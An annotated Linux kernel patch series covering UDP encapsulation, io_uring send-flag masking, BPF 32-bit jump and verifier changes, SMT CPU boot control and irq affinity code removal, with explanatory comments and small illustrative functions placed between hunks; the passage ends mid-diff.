++	if (udp_test_and_set_bit(ENCAP_ENABLED, sk))
+ 		return;
+ 
+-	up->encap_enabled = 1;
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sock->sk->sk_family == PF_INET6)
++	if (READ_ONCE(sk->sk_family) == PF_INET6)
+ 		ipv6_stub->udpv6_encap_enable();
+ #endif
+ 	udp_encap_enable();
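/*
 * Besides moving the flag into udp_flags, the conversion above turns
 * enable into one atomic step: the old code tested up->encap_enabled and
 * then wrote it separately, whereas udp_test_and_set_bit() tests and sets
 * in a single operation, so concurrent callers cannot both observe the
 * bit as clear. Minimal illustration of the claim-once idiom:
 */
static inline bool example_claim_once(unsigned long *flags)
{
	return !test_and_set_bit(0, flags);	/* true only for the first caller */
}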
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 57c626cb4d1a5..67f09a40bcb21 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -389,6 +389,7 @@ int io_send(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (flags & MSG_WAITALL)
+ 		min_ret = iov_iter_count(&msg.msg_iter);
+ 
++	flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 	msg.msg_flags = flags;
+ 	ret = sock_sendmsg(sock, &msg);
+ 	if (ret < min_ret) {
+@@ -1137,6 +1138,7 @@ int io_send_zc(struct io_kiocb *req, unsigned int issue_flags)
+ 		msg_flags |= MSG_DONTWAIT;
+ 	if (msg_flags & MSG_WAITALL)
+ 		min_ret = iov_iter_count(&msg.msg_iter);
++	msg_flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 
+ 	msg.msg_flags = msg_flags;
+ 	msg.msg_ubuf = &io_notif_to_data(zc->notif)->uarg;
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 7225cb67c0d3a..76bf1de261152 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -365,9 +365,18 @@ static int bpf_adj_delta_to_imm(struct bpf_insn *insn, u32 pos, s32 end_old,
+ static int bpf_adj_delta_to_off(struct bpf_insn *insn, u32 pos, s32 end_old,
+ 				s32 end_new, s32 curr, const bool probe_pass)
+ {
+-	const s32 off_min = S16_MIN, off_max = S16_MAX;
++	s64 off_min, off_max, off;
+ 	s32 delta = end_new - end_old;
+-	s32 off = insn->off;
++
++	if (insn->code == (BPF_JMP32 | BPF_JA)) {
++		off = insn->imm;
++		off_min = S32_MIN;
++		off_max = S32_MAX;
++	} else {
++		off = insn->off;
++		off_min = S16_MIN;
++		off_max = S16_MAX;
++	}
+ 
+ 	if (curr < pos && curr + off + 1 >= end_old)
+ 		off += delta;
+@@ -375,8 +384,12 @@ static int bpf_adj_delta_to_off(struct bpf_insn *insn, u32 pos, s32 end_old,
+ 		off -= delta;
+ 	if (off < off_min || off > off_max)
+ 		return -ERANGE;
+-	if (!probe_pass)
+-		insn->off = off;
++	if (!probe_pass) {
++		if (insn->code == (BPF_JMP32 | BPF_JA))
++			insn->imm = off;
++		else
++			insn->off = off;
++	}
+ 	return 0;
+ }
+ 
+@@ -1586,6 +1599,7 @@ EXPORT_SYMBOL_GPL(__bpf_call_base);
+ 	INSN_3(JMP, JSLE, K),			\
+ 	INSN_3(JMP, JSET, K),			\
+ 	INSN_2(JMP, JA),			\
++	INSN_2(JMP32, JA),			\
+ 	/* Store instructions. */		\
+ 	/*   Register based. */			\
+ 	INSN_3(STX, MEM,  B),			\
+@@ -1862,6 +1876,9 @@ out:
+ 	JMP_JA:
+ 		insn += insn->off;
+ 		CONT;
++	JMP32_JA:
++		insn += insn->imm;
++		CONT;
+ 	JMP_EXIT:
+ 		return BPF_R0;
+ 	/* JMP */
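/*
 * BPF_JMP | BPF_JA keeps its displacement in the 16-bit insn->off, while
 * the BPF_JMP32 | BPF_JA variant handled above (the "gotol" form) reuses
 * the 32-bit insn->imm, which is why the interpreter advances by insn->imm
 * for it and bpf_adj_delta_to_off() switches to S32 limits. The selection
 * logic, in isolation:
 */
static s64 bpf_ja_displacement(const struct bpf_insn *insn)
{
	if (insn->code == (BPF_JMP32 | BPF_JA))
		return insn->imm;	/* 32-bit displacement */
	return insn->off;		/* legacy 16-bit displacement */
}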
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index c4381dfcd6b09..748ac86169941 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -443,8 +443,8 @@ static int bpf_trampoline_update(struct bpf_trampoline *tr, bool lock_direct_mut
+ 		goto out;
+ 	}
+ 
+-	/* clear all bits except SHARE_IPMODIFY */
+-	tr->flags &= BPF_TRAMP_F_SHARE_IPMODIFY;
++	/* clear all bits except SHARE_IPMODIFY and TAIL_CALL_CTX */
++	tr->flags &= (BPF_TRAMP_F_SHARE_IPMODIFY | BPF_TRAMP_F_TAIL_CALL_CTX);
+ 
+ 	if (tlinks[BPF_TRAMP_FEXIT].nr_links ||
+ 	    tlinks[BPF_TRAMP_MODIFY_RETURN].nr_links) {
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 12d360d80c149..142e10d49fd81 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2254,7 +2254,10 @@ static int check_subprogs(struct bpf_verifier_env *env)
+ 			goto next;
+ 		if (BPF_OP(code) == BPF_EXIT || BPF_OP(code) == BPF_CALL)
+ 			goto next;
+-		off = i + insn[i].off + 1;
++		if (code == (BPF_JMP32 | BPF_JA))
++			off = i + insn[i].imm + 1;
++		else
++			off = i + insn[i].off + 1;
+ 		if (off < subprog_start || off >= subprog_end) {
+ 			verbose(env, "jump out of range from insn %d to %d\n", i, off);
+ 			return -EINVAL;
+@@ -2266,6 +2269,7 @@ next:
+ 			 * or unconditional jump back
+ 			 */
+ 			if (code != (BPF_JMP | BPF_EXIT) &&
++			    code != (BPF_JMP32 | BPF_JA) &&
+ 			    code != (BPF_JMP | BPF_JA)) {
+ 				verbose(env, "last insn is not an exit or jmp\n");
+ 				return -EINVAL;
+@@ -2512,6 +2516,16 @@ static int check_reg_arg(struct bpf_verifier_env *env, u32 regno,
+ 	return 0;
+ }
+ 
++static void mark_jmp_point(struct bpf_verifier_env *env, int idx)
++{
++	env->insn_aux_data[idx].jmp_point = true;
++}
++
++static bool is_jmp_point(struct bpf_verifier_env *env, int insn_idx)
++{
++	return env->insn_aux_data[insn_idx].jmp_point;
++}
++
+ /* for any branch, call, exit record the history of jmps in the given state */
+ static int push_jmp_history(struct bpf_verifier_env *env,
+ 			    struct bpf_verifier_state *cur)
+@@ -2520,6 +2534,9 @@ static int push_jmp_history(struct bpf_verifier_env *env,
+ 	struct bpf_idx_pair *p;
+ 	size_t alloc_size;
+ 
++	if (!is_jmp_point(env, env->insn_idx))
++		return 0;
++
+ 	cnt++;
+ 	alloc_size = kmalloc_size_roundup(size_mul(cnt, sizeof(*p)));
+ 	p = krealloc(cur->jmp_history, alloc_size, GFP_USER);
+@@ -2534,12 +2551,29 @@ static int push_jmp_history(struct bpf_verifier_env *env,
+ 
+ /* Backtrack one insn at a time. If idx is not at the top of recorded
+  * history then previous instruction came from straight line execution.
++ * Return -ENOENT if we exhausted all instructions within given state.
++ *
++ * It's legal to have a bit of looping with the same starting and ending
++ * insn index within the same state, e.g.: 3->4->5->3, so just because current
++ * instruction index is the same as state's first_idx doesn't mean we are
++ * done. If there is still some jump history left, we should keep going. We
++ * need to take into account that we might have a jump history between given
++ * state's parent and itself, due to checkpointing. In this case, we'll have
++ * history entry recording a jump from last instruction of parent state and
++ * first instruction of given state.
+  */
+ static int get_prev_insn_idx(struct bpf_verifier_state *st, int i,
+ 			     u32 *history)
+ {
+ 	u32 cnt = *history;
+ 
++	if (i == st->first_insn_idx) {
++		if (cnt == 0)
++			return -ENOENT;
++		if (cnt == 1 && st->jmp_history[0].idx == i)
++			return -ENOENT;
++	}
++
+ 	if (cnt && st->jmp_history[cnt - 1].idx == i) {
+ 		i = st->jmp_history[cnt - 1].prev_idx;
+ 		(*history)--;
+@@ -3035,9 +3069,9 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 				 * Nothing to be tracked further in the parent state.
+ 				 */
+ 				return 0;
+-			if (i == first_idx)
+-				break;
+ 			i = get_prev_insn_idx(st, i, &history);
++			if (i == -ENOENT)
++				break;
+ 			if (i >= env->prog->len) {
+ 				/* This can happen if backtracking reached insn 0
+ 				 * and there are still reg_mask or stack_mask
+@@ -11000,11 +11034,16 @@ static struct bpf_verifier_state_list **explored_state(
+ 	return &env->explored_states[(idx ^ state->callsite) % state_htab_size(env)];
+ }
+ 
+-static void init_explored_state(struct bpf_verifier_env *env, int idx)
++static void mark_prune_point(struct bpf_verifier_env *env, int idx)
+ {
+ 	env->insn_aux_data[idx].prune_point = true;
+ }
+ 
++static bool is_prune_point(struct bpf_verifier_env *env, int insn_idx)
++{
++	return env->insn_aux_data[insn_idx].prune_point;
++}
++
+ enum {
+ 	DONE_EXPLORING = 0,
+ 	KEEP_EXPLORING = 1,
+@@ -11033,9 +11072,11 @@ static int push_insn(int t, int w, int e, struct bpf_verifier_env *env,
+ 		return -EINVAL;
+ 	}
+ 
+-	if (e == BRANCH)
++	if (e == BRANCH) {
+ 		/* mark branch target for state pruning */
+-		init_explored_state(env, w);
++		mark_prune_point(env, w);
++		mark_jmp_point(env, w);
++	}
+ 
+ 	if (insn_state[w] == 0) {
+ 		/* tree-edge */
+@@ -11062,21 +11103,23 @@ static int push_insn(int t, int w, int e, struct bpf_verifier_env *env,
+ 	return DONE_EXPLORING;
+ }
+ 
+-static int visit_func_call_insn(int t, int insn_cnt,
+-				struct bpf_insn *insns,
++static int visit_func_call_insn(int t, struct bpf_insn *insns,
+ 				struct bpf_verifier_env *env,
+ 				bool visit_callee)
+ {
+-	int ret;
++	int ret, insn_sz;
+ 
+-	ret = push_insn(t, t + 1, FALLTHROUGH, env, false);
++	insn_sz = bpf_is_ldimm64(&insns[t]) ? 2 : 1;
++	ret = push_insn(t, t + insn_sz, FALLTHROUGH, env, false);
+ 	if (ret)
+ 		return ret;
+ 
+-	if (t + 1 < insn_cnt)
+-		init_explored_state(env, t + 1);
++	mark_prune_point(env, t + insn_sz);
++	/* when we exit from subprog, we need to record non-linear history */
++	mark_jmp_point(env, t + insn_sz);
++
+ 	if (visit_callee) {
+-		init_explored_state(env, t);
++		mark_prune_point(env, t);
+ 		ret = push_insn(t, t + insns[t].imm + 1, BRANCH, env,
+ 				/* It's ok to allow recursion from CFG point of
+ 				 * view. __check_func_call() will do the actual
+@@ -11092,65 +11135,64 @@ static int visit_func_call_insn(int t, int insn_cnt,
+  *  DONE_EXPLORING - the instruction was fully explored
+  *  KEEP_EXPLORING - there is still work to be done before it is fully explored
+  */
+-static int visit_insn(int t, int insn_cnt, struct bpf_verifier_env *env)
++static int visit_insn(int t, struct bpf_verifier_env *env)
+ {
+-	struct bpf_insn *insns = env->prog->insnsi;
+-	int ret;
++	struct bpf_insn *insns = env->prog->insnsi, *insn = &insns[t];
++	int ret, off, insn_sz;
+ 
+-	if (bpf_pseudo_func(insns + t))
+-		return visit_func_call_insn(t, insn_cnt, insns, env, true);
++	if (bpf_pseudo_func(insn))
++		return visit_func_call_insn(t, insns, env, true);
+ 
+ 	/* All non-branch instructions have a single fall-through edge. */
+-	if (BPF_CLASS(insns[t].code) != BPF_JMP &&
+-	    BPF_CLASS(insns[t].code) != BPF_JMP32)
+-		return push_insn(t, t + 1, FALLTHROUGH, env, false);
++	if (BPF_CLASS(insn->code) != BPF_JMP &&
++	    BPF_CLASS(insn->code) != BPF_JMP32) {
++		insn_sz = bpf_is_ldimm64(insn) ? 2 : 1;
++		return push_insn(t, t + insn_sz, FALLTHROUGH, env, false);
++	}
+ 
+-	switch (BPF_OP(insns[t].code)) {
++	switch (BPF_OP(insn->code)) {
+ 	case BPF_EXIT:
+ 		return DONE_EXPLORING;
+ 
+ 	case BPF_CALL:
+-		if (insns[t].imm == BPF_FUNC_timer_set_callback)
+-			/* Mark this call insn to trigger is_state_visited() check
+-			 * before call itself is processed by __check_func_call().
+-			 * Otherwise new async state will be pushed for further
+-			 * exploration.
++		if (insn->imm == BPF_FUNC_timer_set_callback)
++			/* Mark this call insn as a prune point to trigger
++			 * is_state_visited() check before call itself is
++			 * processed by __check_func_call(). Otherwise new
++			 * async state will be pushed for further exploration.
+ 			 */
+-			init_explored_state(env, t);
+-		return visit_func_call_insn(t, insn_cnt, insns, env,
+-					    insns[t].src_reg == BPF_PSEUDO_CALL);
++			mark_prune_point(env, t);
++		return visit_func_call_insn(t, insns, env, insn->src_reg == BPF_PSEUDO_CALL);
+ 
+ 	case BPF_JA:
+-		if (BPF_SRC(insns[t].code) != BPF_K)
++		if (BPF_SRC(insn->code) != BPF_K)
+ 			return -EINVAL;
+ 
++		if (BPF_CLASS(insn->code) == BPF_JMP)
++			off = insn->off;
++		else
++			off = insn->imm;
++
+ 		/* unconditional jump with single edge */
+-		ret = push_insn(t, t + insns[t].off + 1, FALLTHROUGH, env,
++		ret = push_insn(t, t + off + 1, FALLTHROUGH, env,
+ 				true);
+ 		if (ret)
+ 			return ret;
+ 
+-		/* unconditional jmp is not a good pruning point,
+-		 * but it's marked, since backtracking needs
+-		 * to record jmp history in is_state_visited().
+-		 */
+-		init_explored_state(env, t + insns[t].off + 1);
+-		/* tell verifier to check for equivalent states
+-		 * after every call and jump
+-		 */
+-		if (t + 1 < insn_cnt)
+-			init_explored_state(env, t + 1);
++		mark_prune_point(env, t + off + 1);
++		mark_jmp_point(env, t + off + 1);
+ 
+ 		return ret;
+ 
+ 	default:
+ 		/* conditional jump with two edges */
+-		init_explored_state(env, t);
++		mark_prune_point(env, t);
++
+ 		ret = push_insn(t, t + 1, FALLTHROUGH, env, true);
+ 		if (ret)
+ 			return ret;
+ 
+-		return push_insn(t, t + insns[t].off + 1, BRANCH, env, true);
++		return push_insn(t, t + insn->off + 1, BRANCH, env, true);
+ 	}
+ }
+ 
+@@ -11181,7 +11223,7 @@ static int check_cfg(struct bpf_verifier_env *env)
+ 	while (env->cfg.cur_stack > 0) {
+ 		int t = insn_stack[env->cfg.cur_stack - 1];
+ 
+-		ret = visit_insn(t, insn_cnt, env);
++		ret = visit_insn(t, env);
+ 		switch (ret) {
+ 		case DONE_EXPLORING:
+ 			insn_state[t] = EXPLORED;
+@@ -11205,11 +11247,21 @@ static int check_cfg(struct bpf_verifier_env *env)
+ 	}
+ 
+ 	for (i = 0; i < insn_cnt; i++) {
++		struct bpf_insn *insn = &env->prog->insnsi[i];
++
+ 		if (insn_state[i] != EXPLORED) {
+ 			verbose(env, "unreachable insn %d\n", i);
+ 			ret = -EINVAL;
+ 			goto err_free;
+ 		}
++		if (bpf_is_ldimm64(insn)) {
++			if (insn_state[i + 1] != 0) {
++				verbose(env, "jump into the middle of ldimm64 insn %d\n", i);
++				ret = -EINVAL;
++				goto err_free;
++			}
++			i++; /* skip second half of ldimm64 */
++		}
+ 	}
+ 	ret = 0; /* cfg looks good */
+ 
+@@ -12178,11 +12230,11 @@ static int is_state_visited(struct bpf_verifier_env *env, int insn_idx)
+ 	bool add_new_state = env->test_state_freq ? true : false;
+ 
+ 	cur->last_insn_idx = env->prev_insn_idx;
+-	if (!env->insn_aux_data[insn_idx].prune_point)
++	if (!is_prune_point(env, insn_idx))
+ 		/* this 'insn_idx' instruction wasn't marked, so we will not
+ 		 * be doing state search here
+ 		 */
+-		return 0;
++		return push_jmp_history(env, cur);
+ 
+ 	/* bpf progs typically have pruning point every 4 instructions
+ 	 * http://vger.kernel.org/bpfconf2019.html#session-1
+@@ -12674,15 +12726,18 @@ static int do_check(struct bpf_verifier_env *env)
+ 					return err;
+ 			} else if (opcode == BPF_JA) {
+ 				if (BPF_SRC(insn->code) != BPF_K ||
+-				    insn->imm != 0 ||
+ 				    insn->src_reg != BPF_REG_0 ||
+ 				    insn->dst_reg != BPF_REG_0 ||
+-				    class == BPF_JMP32) {
++				    (class == BPF_JMP && insn->imm != 0) ||
++				    (class == BPF_JMP32 && insn->off != 0)) {
+ 					verbose(env, "BPF_JA uses reserved fields\n");
+ 					return -EINVAL;
+ 				}
+ 
+-				env->insn_idx += insn->off + 1;
++				if (class == BPF_JMP)
++					env->insn_idx += insn->off + 1;
++				else
++					env->insn_idx += insn->imm + 1;
+ 				continue;
+ 
+ 			} else if (opcode == BPF_EXIT) {
+@@ -13508,13 +13563,13 @@ static bool insn_is_cond_jump(u8 code)
+ {
+ 	u8 op;
+ 
++	op = BPF_OP(code);
+ 	if (BPF_CLASS(code) == BPF_JMP32)
+-		return true;
++		return op != BPF_JA;
+ 
+ 	if (BPF_CLASS(code) != BPF_JMP)
+ 		return false;
+ 
+-	op = BPF_OP(code);
+ 	return op != BPF_JA && op != BPF_EXIT && op != BPF_CALL;
+ }
+ 
+@@ -15442,6 +15497,9 @@ static int check_attach_btf_id(struct bpf_verifier_env *env)
+ 	if (!tr)
+ 		return -ENOMEM;
+ 
++	if (tgt_prog && tgt_prog->aux->tail_call_reachable)
++		tr->flags = BPF_TRAMP_F_TAIL_CALL_CTX;
++
+ 	prog->aux->dst_trampoline = tr;
+ 	return 0;
+ }
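/*
 * BPF_LD | BPF_IMM | BPF_DW (ldimm64) is the one double-wide eBPF
 * instruction: its 64-bit immediate spills into a second struct bpf_insn
 * slot. That is why the CFG walk above steps by insn_sz rather than 1, and
 * why check_cfg() now rejects any jump landing on the hidden second slot.
 * The step computation, in isolation:
 */
static int example_insn_size(const struct bpf_insn *insn)
{
	return bpf_is_ldimm64(insn) ? 2 : 1;	/* slot 2 carries the upper imm bits */
}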
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 551468d9c5a85..e6f0101941ed8 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -446,9 +446,31 @@ static int __init smt_cmdline_disable(char *str)
+ }
+ early_param("nosmt", smt_cmdline_disable);
+ 
+-static inline bool cpu_smt_allowed(unsigned int cpu)
++/*
++ * For architectures supporting partial SMT states, check if the thread is allowed.
++ * Otherwise this has already been checked through cpu_smt_max_threads when
++ * setting the SMT level.
++ */
++static inline bool cpu_smt_thread_allowed(unsigned int cpu)
+ {
+-	if (cpu_smt_control == CPU_SMT_ENABLED)
++#ifdef CONFIG_SMT_NUM_THREADS_DYNAMIC
++	return topology_smt_thread_allowed(cpu);
++#else
++	return true;
++#endif
++}
++
++static inline bool cpu_bootable(unsigned int cpu)
++{
++	if (cpu_smt_control == CPU_SMT_ENABLED && cpu_smt_thread_allowed(cpu))
++		return true;
++
++	/* All CPUs are bootable if controls are not configured */
++	if (cpu_smt_control == CPU_SMT_NOT_IMPLEMENTED)
++		return true;
++
++	/* All CPUs are bootable if CPU is not SMT capable */
++	if (cpu_smt_control == CPU_SMT_NOT_SUPPORTED)
+ 		return true;
+ 
+ 	if (topology_is_primary_thread(cpu))
+@@ -471,7 +493,7 @@ bool cpu_smt_possible(void)
+ }
+ EXPORT_SYMBOL_GPL(cpu_smt_possible);
+ #else
+-static inline bool cpu_smt_allowed(unsigned int cpu) { return true; }
++static inline bool cpu_bootable(unsigned int cpu) { return true; }
+ #endif
+ 
+ static inline enum cpuhp_state
+@@ -574,10 +596,10 @@ static int bringup_wait_for_ap(unsigned int cpu)
+ 	 * SMT soft disabling on X86 requires to bring the CPU out of the
+ 	 * BIOS 'wait for SIPI' state in order to set the CR4.MCE bit.  The
+ 	 * CPU marked itself as booted_once in notify_cpu_starting() so the
+-	 * cpu_smt_allowed() check will now return false if this is not the
++	 * cpu_bootable() check will now return false if this is not the
+ 	 * primary sibling.
+ 	 */
+-	if (!cpu_smt_allowed(cpu))
++	if (!cpu_bootable(cpu))
+ 		return -ECANCELED;
+ 
+ 	if (st->target <= CPUHP_AP_ONLINE_IDLE)
+@@ -1464,7 +1486,7 @@ static int cpu_up(unsigned int cpu, enum cpuhp_state target)
+ 		err = -EBUSY;
+ 		goto out;
+ 	}
+-	if (!cpu_smt_allowed(cpu)) {
++	if (!cpu_bootable(cpu)) {
+ 		err = -EPERM;
+ 		goto out;
+ 	}
+@@ -2294,6 +2316,12 @@ int cpuhp_smt_disable(enum cpuhp_smt_control ctrlval)
+ 	for_each_online_cpu(cpu) {
+ 		if (topology_is_primary_thread(cpu))
+ 			continue;
++		/*
++		 * Disable can be called with CPU_SMT_ENABLED when changing
++		 * from a higher to lower number of SMT threads per core.
++		 */
++		if (ctrlval == CPU_SMT_ENABLED && cpu_smt_thread_allowed(cpu))
++			continue;
+ 		ret = cpu_down_maps_locked(cpu, CPUHP_OFFLINE);
+ 		if (ret)
+ 			break;
+@@ -2328,6 +2356,8 @@ int cpuhp_smt_enable(void)
+ 		/* Skip online CPUs and CPUs on offline nodes */
+ 		if (cpu_online(cpu) || !node_online(cpu_to_node(cpu)))
+ 			continue;
++		if (!cpu_smt_thread_allowed(cpu))
++			continue;
+ 		ret = _cpu_up(cpu, 0, CPUHP_ONLINE);
+ 		if (ret)
+ 			break;
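
The cpu_bootable() chain above is easy to misread because order matters: the partial-SMT check applies only in the CPU_SMT_ENABLED case, while the NOT_IMPLEMENTED/NOT_SUPPORTED cases short-circuit to true. A minimal userspace sketch of that decision chain; the enum values and helper predicates are stand-ins, not kernel API.

/* Userspace sketch of the cpu_bootable() decision order. */
#include <stdbool.h>
#include <stdio.h>

enum smt_control { SMT_ENABLED, SMT_NOT_IMPLEMENTED, SMT_NOT_SUPPORTED,
		   SMT_DISABLED };

static bool thread_allowed(int cpu)    { return cpu % 2 == 0; } /* stand-in */
static bool is_primary_thread(int cpu) { return cpu % 4 == 0; } /* stand-in */

static bool cpu_bootable(int cpu, enum smt_control ctrl)
{
	if (ctrl == SMT_ENABLED && thread_allowed(cpu))
		return true;
	/* All CPUs are bootable if controls are not configured */
	if (ctrl == SMT_NOT_IMPLEMENTED)
		return true;
	/* All CPUs are bootable if the CPU is not SMT capable */
	if (ctrl == SMT_NOT_SUPPORTED)
		return true;
	/* Otherwise only primary siblings may boot */
	return is_primary_thread(cpu);
}

int main(void)
{
	printf("cpu2 bootable: %d\n", cpu_bootable(2, SMT_ENABLED));
	return 0;
}
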
+diff --git a/kernel/irq/affinity.c b/kernel/irq/affinity.c
+index d9a5c1d65a79d..44a4eba80315c 100644
+--- a/kernel/irq/affinity.c
++++ b/kernel/irq/affinity.c
+@@ -7,398 +7,7 @@
+ #include <linux/kernel.h>
+ #include <linux/slab.h>
+ #include <linux/cpu.h>
+-#include <linux/sort.h>
+-
+-static void irq_spread_init_one(struct cpumask *irqmsk, struct cpumask *nmsk,
+-				unsigned int cpus_per_vec)
+-{
+-	const struct cpumask *siblmsk;
+-	int cpu, sibl;
+-
+-	for ( ; cpus_per_vec > 0; ) {
+-		cpu = cpumask_first(nmsk);
+-
+-		/* Should not happen, but I'm too lazy to think about it */
+-		if (cpu >= nr_cpu_ids)
+-			return;
+-
+-		cpumask_clear_cpu(cpu, nmsk);
+-		cpumask_set_cpu(cpu, irqmsk);
+-		cpus_per_vec--;
+-
+-		/* If the cpu has siblings, use them first */
+-		siblmsk = topology_sibling_cpumask(cpu);
+-		for (sibl = -1; cpus_per_vec > 0; ) {
+-			sibl = cpumask_next(sibl, siblmsk);
+-			if (sibl >= nr_cpu_ids)
+-				break;
+-			if (!cpumask_test_and_clear_cpu(sibl, nmsk))
+-				continue;
+-			cpumask_set_cpu(sibl, irqmsk);
+-			cpus_per_vec--;
+-		}
+-	}
+-}
+-
+-static cpumask_var_t *alloc_node_to_cpumask(void)
+-{
+-	cpumask_var_t *masks;
+-	int node;
+-
+-	masks = kcalloc(nr_node_ids, sizeof(cpumask_var_t), GFP_KERNEL);
+-	if (!masks)
+-		return NULL;
+-
+-	for (node = 0; node < nr_node_ids; node++) {
+-		if (!zalloc_cpumask_var(&masks[node], GFP_KERNEL))
+-			goto out_unwind;
+-	}
+-
+-	return masks;
+-
+-out_unwind:
+-	while (--node >= 0)
+-		free_cpumask_var(masks[node]);
+-	kfree(masks);
+-	return NULL;
+-}
+-
+-static void free_node_to_cpumask(cpumask_var_t *masks)
+-{
+-	int node;
+-
+-	for (node = 0; node < nr_node_ids; node++)
+-		free_cpumask_var(masks[node]);
+-	kfree(masks);
+-}
+-
+-static void build_node_to_cpumask(cpumask_var_t *masks)
+-{
+-	int cpu;
+-
+-	for_each_possible_cpu(cpu)
+-		cpumask_set_cpu(cpu, masks[cpu_to_node(cpu)]);
+-}
+-
+-static int get_nodes_in_cpumask(cpumask_var_t *node_to_cpumask,
+-				const struct cpumask *mask, nodemask_t *nodemsk)
+-{
+-	int n, nodes = 0;
+-
+-	/* Calculate the number of nodes in the supplied affinity mask */
+-	for_each_node(n) {
+-		if (cpumask_intersects(mask, node_to_cpumask[n])) {
+-			node_set(n, *nodemsk);
+-			nodes++;
+-		}
+-	}
+-	return nodes;
+-}
+-
+-struct node_vectors {
+-	unsigned id;
+-
+-	union {
+-		unsigned nvectors;
+-		unsigned ncpus;
+-	};
+-};
+-
+-static int ncpus_cmp_func(const void *l, const void *r)
+-{
+-	const struct node_vectors *ln = l;
+-	const struct node_vectors *rn = r;
+-
+-	return ln->ncpus - rn->ncpus;
+-}
+-
+-/*
+- * Allocate vector number for each node, so that for each node:
+- *
+- * 1) the allocated number is >= 1
+- *
+- * 2) the allocated numbver is <= active CPU number of this node
+- *
+- * The actual allocated total vectors may be less than @numvecs when
+- * active total CPU number is less than @numvecs.
+- *
+- * Active CPUs means the CPUs in '@cpu_mask AND @node_to_cpumask[]'
+- * for each node.
+- */
+-static void alloc_nodes_vectors(unsigned int numvecs,
+-				cpumask_var_t *node_to_cpumask,
+-				const struct cpumask *cpu_mask,
+-				const nodemask_t nodemsk,
+-				struct cpumask *nmsk,
+-				struct node_vectors *node_vectors)
+-{
+-	unsigned n, remaining_ncpus = 0;
+-
+-	for (n = 0; n < nr_node_ids; n++) {
+-		node_vectors[n].id = n;
+-		node_vectors[n].ncpus = UINT_MAX;
+-	}
+-
+-	for_each_node_mask(n, nodemsk) {
+-		unsigned ncpus;
+-
+-		cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
+-		ncpus = cpumask_weight(nmsk);
+-
+-		if (!ncpus)
+-			continue;
+-		remaining_ncpus += ncpus;
+-		node_vectors[n].ncpus = ncpus;
+-	}
+-
+-	numvecs = min_t(unsigned, remaining_ncpus, numvecs);
+-
+-	sort(node_vectors, nr_node_ids, sizeof(node_vectors[0]),
+-	     ncpus_cmp_func, NULL);
+-
+-	/*
+-	 * Allocate vectors for each node according to the ratio of this
+-	 * node's nr_cpus to remaining un-assigned ncpus. 'numvecs' is
+-	 * bigger than number of active numa nodes. Always start the
+-	 * allocation from the node with minimized nr_cpus.
+-	 *
+-	 * This way guarantees that each active node gets allocated at
+-	 * least one vector, and the theory is simple: over-allocation
+-	 * is only done when this node is assigned by one vector, so
+-	 * other nodes will be allocated >= 1 vector, since 'numvecs' is
+-	 * bigger than number of numa nodes.
+-	 *
+-	 * One perfect invariant is that number of allocated vectors for
+-	 * each node is <= CPU count of this node:
+-	 *
+-	 * 1) suppose there are two nodes: A and B
+-	 * 	ncpu(X) is CPU count of node X
+-	 * 	vecs(X) is the vector count allocated to node X via this
+-	 * 	algorithm
+-	 *
+-	 * 	ncpu(A) <= ncpu(B)
+-	 * 	ncpu(A) + ncpu(B) = N
+-	 * 	vecs(A) + vecs(B) = V
+-	 *
+-	 * 	vecs(A) = max(1, round_down(V * ncpu(A) / N))
+-	 * 	vecs(B) = V - vecs(A)
+-	 *
+-	 * 	both N and V are integer, and 2 <= V <= N, suppose
+-	 * 	V = N - delta, and 0 <= delta <= N - 2
+-	 *
+-	 * 2) obviously vecs(A) <= ncpu(A) because:
+-	 *
+-	 * 	if vecs(A) is 1, then vecs(A) <= ncpu(A) given
+-	 * 	ncpu(A) >= 1
+-	 *
+-	 * 	otherwise,
+-	 * 		vecs(A) <= V * ncpu(A) / N <= ncpu(A), given V <= N
+-	 *
+-	 * 3) prove how vecs(B) <= ncpu(B):
+-	 *
+-	 * 	if round_down(V * ncpu(A) / N) == 0, vecs(B) won't be
+-	 * 	over-allocated, so vecs(B) <= ncpu(B),
+-	 *
+-	 * 	otherwise:
+-	 *
+-	 * 	vecs(A) =
+-	 * 		round_down(V * ncpu(A) / N) =
+-	 * 		round_down((N - delta) * ncpu(A) / N) =
+-	 * 		round_down((N * ncpu(A) - delta * ncpu(A)) / N)	 >=
+-	 * 		round_down((N * ncpu(A) - delta * N) / N)	 =
+-	 * 		cpu(A) - delta
+-	 *
+-	 * 	then:
+-	 *
+-	 * 	vecs(A) - V >= ncpu(A) - delta - V
+-	 * 	=>
+-	 * 	V - vecs(A) <= V + delta - ncpu(A)
+-	 * 	=>
+-	 * 	vecs(B) <= N - ncpu(A)
+-	 * 	=>
+-	 * 	vecs(B) <= cpu(B)
+-	 *
+-	 * For nodes >= 3, it can be thought as one node and another big
+-	 * node given that is exactly what this algorithm is implemented,
+-	 * and we always re-calculate 'remaining_ncpus' & 'numvecs', and
+-	 * finally for each node X: vecs(X) <= ncpu(X).
+-	 *
+-	 */
+-	for (n = 0; n < nr_node_ids; n++) {
+-		unsigned nvectors, ncpus;
+-
+-		if (node_vectors[n].ncpus == UINT_MAX)
+-			continue;
+-
+-		WARN_ON_ONCE(numvecs == 0);
+-
+-		ncpus = node_vectors[n].ncpus;
+-		nvectors = max_t(unsigned, 1,
+-				 numvecs * ncpus / remaining_ncpus);
+-		WARN_ON_ONCE(nvectors > ncpus);
+-
+-		node_vectors[n].nvectors = nvectors;
+-
+-		remaining_ncpus -= ncpus;
+-		numvecs -= nvectors;
+-	}
+-}
+-
+-static int __irq_build_affinity_masks(unsigned int startvec,
+-				      unsigned int numvecs,
